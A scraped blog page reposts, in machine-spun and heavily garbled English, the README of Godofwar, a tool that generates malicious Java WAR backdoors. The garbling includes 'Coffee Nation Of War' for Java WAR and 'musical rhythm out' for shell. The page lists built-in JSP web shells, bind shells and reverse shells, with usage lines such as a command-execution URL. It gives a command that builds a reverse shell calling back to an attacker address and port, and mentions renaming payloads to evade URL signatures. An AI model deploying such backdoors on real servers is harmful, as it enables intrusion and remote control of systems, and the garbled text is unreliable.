Godofwar - Malicious Coffee Nation Of War Builder Amongst Built-In Payloads
Wednesday, September 11, 2019
Edit
Godofwar - Malicious Coffee Nation Of War Builder Amongst Built-In Payloads - Hi friends mederc, In the article that you read this time with the title Godofwar - Malicious Coffee Nation Of War Builder Amongst Built-In Payloads, We have prepared this article well for you to read and retrieve information from it. hopefully fill the posts
Article Bind Shell,
Article Godofwar,
Article JAR,
Article JSP,
Article Linux,
Article msfvenom,
Article Payload,
Article Penetration Testing,
Article Red Teaming,
Article Reverse Shell, we write this you can understand. Alright, happy reading.
Title : Godofwar - Malicious Coffee Nation Of War Builder Amongst Built-In Payloads
link : Godofwar - Malicious Coffee Nation Of War Builder Amongst Built-In Payloads
Influenza A virus subtype H5N1 command-line tool to generate nation of war payloads for penetration testing / red teaming purposes, written inwards ruby.
Features
Installation
Usage
Example
List all payloads
Contributing
Add More Backdoors
To contribute past times adding to a greater extent than backdoors:
You are now reading the article Godofwar - Malicious Coffee Nation Of War Builder Amongst Built-In Payloads with the link address https://mederc.blogspot.com/2019/09/godofwar-malicious-coffee-nation-of-war.html
Title : Godofwar - Malicious Coffee Nation Of War Builder Amongst Built-In Payloads
Godofwar - Malicious Coffee Nation Of War Builder Amongst Built-In Payloads
Influenza A virus subtype H5N1 command-line tool to generate nation of war payloads for penetration testing / red teaming purposes, written inwards ruby.
Features
- Preexisting payloads. (try
-l/--list
)- cmd_get
- filebrowser
- bind_shell
- reverse_shell
- reverse_shell_ui
- Configurable backdoor. (try
--host/-port
) - Control over payload name.
- To avoid malicious cite subsequently deployment to bypass URL cite signatures.
Installation
$ precious rock install godofwar
$ godofwar -h Help menu: -p, --payload PAYLOAD Generates nation of war from ane of the available payloads. (check -l/--list) -H, --host IP_ADDR Local or Remote IP address for the chosen payload (used alongside -p/--payload) -P, --port PORT Local or Remote Port for the chosen payload (used alongside -p/--payload) -o, --output [FILE] Output file in addition to the deployment name. (default is the payload original name. depository fiscal establishment jibe '-l/--list') -l, --list listing all available payloads. -h, --help Show this assist message.
Example
List all payloads
$ godofwar -l ├── cmd_get │ └── Information: │ ├── Description: Command execution via spider web interface │ ├── OS: whatsoever │ ├── Settings: {"false"=>"No Settings required!"} │ ├── Usage: http://host/cmd.jsp?cmd=whoami │ ├── References: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"] │ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get ├── filebrowser │ └── Information: │ ├── Description: Remote file browser, upload, download, unzip files in addition to native ascendance execution │ ├── OS: whatsoever │ ├ ;── Settings: {"false"=>"No Settings required!"} │ ├── Usage: http://host/filebrowser.jsp │ ├── References: ["http://www.vonloesch.de/filebrowser.html"] │ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser ├── bind_shell │ └── Information: │ ├── Description: TCP bind musical rhythm out │ ├── OS: whatsoever │ ├── Settings: {"port"=>4444, "false"=>"No Settings required!"} │ ├── Usage: http://host/reverse-shell.jsp │ ├── References: ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"] │ └ ── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell ├── reverse_shell_ui │ └── Information: │ ├── Description: TCP opposite musical rhythm out alongside a HTML shape to educate LHOST in addition to LPORT from browser. │ ├── OS: whatsoever │ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"} │ ├── Usage: http://host/reverse_shell_ui.jsp │ ├── References: [] │ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui ├── reverse_shell │ └── Information: │ ├── De scription: TCP opposite shell. LHOST in addition to LPORT are hardcoded │ ├── OS: whatsoever │ ├── Settings: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"} │ ├── Usage: http://host/reverse_shell.jsp │ ├── References: [] │ └── Local Path: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
Generate payload alongside LHOST in addition to LPORTgodofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy
After deployment, you lot tin view your musical rhythm out on (http://host:8080/puppy/puppy.jsp)Contributing
- Fork it ( https://github.com/KINGSABRI/godofwar/fork ).
- Create your characteristic branch (git checkout -b my-new-feature).
- Commit your changes (git commit -am 'Add to a greater extent than or less feature').
- Push to the branch (git force rootage my-new-feature).
- Create a novel Pull Request.
Add More Backdoors
To contribute past times adding to a greater extent than backdoors:
- create a novel folder nether
payloads
directory. - put your
jsp
file nether the newly created directory (make it the same directory name). - update
payloads_info.json
file with- description.
- supported operating organisation (try to larn inwards universal though).
- configurations: default host in addition to port.
- references: the payload rootage or its creator credits.
Thus the article Godofwar - Malicious Coffee Nation Of War Builder Amongst Built-In Payloads
That's all the article Godofwar - Malicious Coffee Nation Of War Builder Amongst Built-In Payloads this time, hopefully can benefit you all. okay, see you in another article posting.
You are now reading the article Godofwar - Malicious Coffee Nation Of War Builder Amongst Built-In Payloads with the link address https://mederc.blogspot.com/2019/09/godofwar-malicious-coffee-nation-of-war.html